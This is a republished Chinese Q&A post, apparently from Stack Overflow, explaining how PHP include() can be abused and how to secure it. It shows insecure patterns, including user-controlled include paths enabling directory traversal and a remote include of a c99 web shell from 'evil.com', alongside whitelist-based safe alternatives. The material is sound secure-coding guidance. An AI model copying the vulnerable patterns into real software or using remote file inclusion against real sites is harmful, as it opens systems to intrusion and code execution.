我正在使用“include”函数(e.x.“include’head2.PHP’”或“include’class.users.PHP’”)
在我的网站中添加标题或会话类.我真的不记得在哪里,但我听说黑客滥用,不知何故,这个“包含”的东西,发送虚假的包含页面或类似的东西.
所以基本上我想知道什么是“包含”功能,我该如何保护它,它们如何滥用它以及是否有更好的解决方案来满足我的需求.
在我的网站中添加标题或会话类.我真的不记得在哪里,但我听说黑客滥用,不知何故,这个“包含”的东西,发送虚假的包含页面或类似的东西.
所以基本上我想知道什么是“包含”功能,我该如何保护它,它们如何滥用它以及是否有更好的解决方案来满足我的需求.
提前致谢.
这一切都取决于你如何实现它.如果您专门设置路径,那么它是安全的.如果允许用户输入确定文件路径而不进行清理或检查,则可能发生攻击.
不安全(目录遍历)
<?PHP include($_GET['file']); ?>
不安全(URL fopen – 如果启用)
<?PHP include('http://evil.com/c99shell.PHP'); ?>
不安全
<?PHP include('./some_dir/' . $_GET['file']); ?>
<?PHP include('./some_dir/' . $_GET['file'] . '.PHP'); ?>
安全(虽然不确定为什么有人会这样做.)
<?PHP $allowed = array( 'somefile.PHP','someotherfile.PHP' ); if (in_array(basename($_GET['file']),$allowed)) { include('./includes/' . basename($_GET['file'])); } ?>
安全
<?PHP include('./includes/somefile.PHP'); ?>
原文地址:https://www.jb51.cc/php/135751.html
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。